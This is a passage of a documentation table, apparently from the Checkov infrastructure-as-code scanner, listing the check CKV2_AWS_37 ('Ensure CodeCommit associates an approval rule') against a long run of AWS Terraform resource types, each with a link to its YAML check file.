aws_dx_hosted_transit_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1053 | CKV2_AWS_37 | resource | aws_dx_hosted_transit_virtual_interface_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1054 | CKV2_AWS_37 | resource | aws_dx_lag | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1055 | CKV2_AWS_37 | resource | aws_dx_private_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1056 | CKV2_AWS_37 | resource | aws_dx_public_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1057 | CKV2_AWS_37 | resource | aws_dx_transit_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1058 | CKV2_AWS_37 | resource | aws_dynamodb_global_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1059 | CKV2_AWS_37 | resource | 
aws_dynamodb_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1060 | CKV2_AWS_37 | resource | aws_dynamodb_table_item | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1061 | CKV2_AWS_37 | resource | aws_ebs_default_kms_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1062 | CKV2_AWS_37 | resource | aws_ebs_encryption_by_default | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1063 | CKV2_AWS_37 | resource | aws_ebs_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1064 | CKV2_AWS_37 | resource | aws_ebs_snapshot_copy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1065 | CKV2_AWS_37 | resource | aws_ebs_volume | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1066 
| CKV2_AWS_37 | resource | aws_ec2_availability_zone_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1067 | CKV2_AWS_37 | resource | aws_ec2_capacity_reservation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1068 | CKV2_AWS_37 | resource | aws_ec2_client_vpn_authorization_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1069 | CKV2_AWS_37 | resource | aws_ec2_client_vpn_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1070 | CKV2_AWS_37 | resource | aws_ec2_client_vpn_network_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1071 | CKV2_AWS_37 | resource | aws_ec2_client_vpn_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1072 | CKV2_AWS_37 | resource | aws_ec2_fleet | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1073 | CKV2_AWS_37 | resource | aws_ec2_local_gateway_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1074 | CKV2_AWS_37 | resource | aws_ec2_local_gateway_route_table_vpc_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1075 | CKV2_AWS_37 | resource | aws_ec2_tag | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1076 | CKV2_AWS_37 | resource | aws_ec2_traffic_mirror_filter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1077 | CKV2_AWS_37 | resource | aws_ec2_traffic_mirror_filter_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1078 | CKV2_AWS_37 | resource | aws_ec2_traffic_mirror_session | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1079 | CKV2_AWS_37 | resource | 
aws_ec2_traffic_mirror_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1080 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1081 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_peering_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1082 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_peering_attachment_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1083 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1084 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_route_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1085 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_route_table_association | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1086 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_route_table_propagation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1087 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_vpc_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1088 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_vpc_attachment_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1089 | CKV2_AWS_37 | resource | aws_ecr_lifecycle_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1090 | CKV2_AWS_37 | resource | aws_ecr_repository | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1091 | CKV2_AWS_37 | resource | aws_ecr_repository_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1092 | 
CKV2_AWS_37 | resource | aws_ecs_capacity_provider | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1093 | CKV2_AWS_37 | resource | aws_ecs_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1094 | CKV2_AWS_37 | resource | aws_ecs_service | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1095 | CKV2_AWS_37 | resource | aws_ecs_task_definition | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1096 | CKV2_AWS_37 | resource | aws_efs_access_point | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1097 | CKV2_AWS_37 | resource | aws_efs_file_system | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1098 | CKV2_AWS_37 | resource | aws_efs_file_system_policy | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1099 | CKV2_AWS_37 | resource | aws_efs_mount_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1100 | CKV2_AWS_37 | resource | aws_egress_only_internet_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1101 | CKV2_AWS_37 | resource | aws_eip | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1102 | CKV2_AWS_37 | resource | aws_eip_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1103 | CKV2_AWS_37 | resource | aws_eks_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1104 | CKV2_AWS_37 | resource | aws_eks_fargate_profile | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1105 | CKV2_AWS_37 | resource | aws_eks_node_group | Ensure CodeCommit associates an approval 
rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1106 | CKV2_AWS_37 | resource | aws_elastic_beanstalk_application | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1107 | CKV2_AWS_37 | resource | aws_elastic_beanstalk_application_version | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1108 | CKV2_AWS_37 | resource | aws_elastic_beanstalk_configuration_template | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1109 | CKV2_AWS_37 | resource | aws_elastic_beanstalk_environment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1110 | CKV2_AWS_37 | resource | aws_elasticache_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1111 | CKV2_AWS_37 | resource | aws_elasticache_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1112 | CKV2_AWS_37 | resource | aws_elasticache_replication_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1113 | CKV2_AWS_37 | resource | aws_elasticache_security_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1114 | CKV2_AWS_37 | resource | aws_elasticache_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1115 | CKV2_AWS_37 | resource | aws_elasticsearch_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1116 | CKV2_AWS_37 | resource | aws_elasticsearch_domain_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1117 | CKV2_AWS_37 | resource | aws_elastictranscoder_pipeline | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1118 | CKV2_AWS_37 | resource | 
aws_elastictranscoder_preset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1119 | CKV2_AWS_37 | resource | aws_elb | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1120 | CKV2_AWS_37 | resource | aws_elb_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1121 | CKV2_AWS_37 | resource | aws_emr_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1122 | CKV2_AWS_37 | resource | aws_emr_instance_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1123 | CKV2_AWS_37 | resource | aws_emr_security_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1124 | CKV2_AWS_37 | resource | aws_flow_log | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1125 | 
CKV2_AWS_37 | resource | aws_fms_admin_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1126 | CKV2_AWS_37 | resource | aws_fsx_lustre_file_system | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1127 | CKV2_AWS_37 | resource | aws_fsx_windows_file_system | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1128 | CKV2_AWS_37 | resource | aws_gamelift_alias | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1129 | CKV2_AWS_37 | resource | aws_gamelift_build | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1130 | CKV2_AWS_37 | resource | aws_gamelift_fleet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1131 | CKV2_AWS_37 | resource | aws_gamelift_game_session_queue | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1132 | CKV2_AWS_37 | resource | aws_glacier_vault | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1133 | CKV2_AWS_37 | resource | aws_glacier_vault_lock | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1134 | CKV2_AWS_37 | resource | aws_globalaccelerator_accelerator | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1135 | CKV2_AWS_37 | resource | aws_globalaccelerator_endpoint_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1136 | CKV2_AWS_37 | resource | aws_globalaccelerator_listener | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1137 | CKV2_AWS_37 | resource | aws_glue_catalog_database | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1138 | CKV2_AWS_37 | resource | 
aws_glue_catalog_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1139 | CKV2_AWS_37 | resource | aws_glue_classifier | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1140 | CKV2_AWS_37 | resource | aws_glue_connection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1141 | CKV2_AWS_37 | resource | aws_glue_crawler | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1142 | CKV2_AWS_37 | resource | aws_glue_job | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1143 | CKV2_AWS_37 | resource | aws_glue_security_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1144 | CKV2_AWS_37 | resource | aws_glue_trigger | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1145 | 
CKV2_AWS_37 | resource | aws_glue_workflow | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1146 | CKV2_AWS_37 | resource | aws_guardduty_detector | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1147 | CKV2_AWS_37 | resource | aws_guardduty_invite_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1148 | CKV2_AWS_37 | resource | aws_guardduty_ipset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1149 | CKV2_AWS_37 | resource | aws_guardduty_member | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1150 | CKV2_AWS_37 | resource | aws_guardduty_organization_admin_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1151 | CKV2_AWS_37 | resource | aws_guardduty_organization_configuration | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1152 | CKV2_AWS_37 | resource | aws_guardduty_threatintelset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1153 | CKV2_AWS_37 | resource | aws_iam_access_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1154 | CKV2_AWS_37 | resource | aws_iam_account_alias | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1155 | CKV2_AWS_37 | resource | aws_iam_account_password_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1156 | CKV2_AWS_37 | resource | aws_iam_group | Ensure 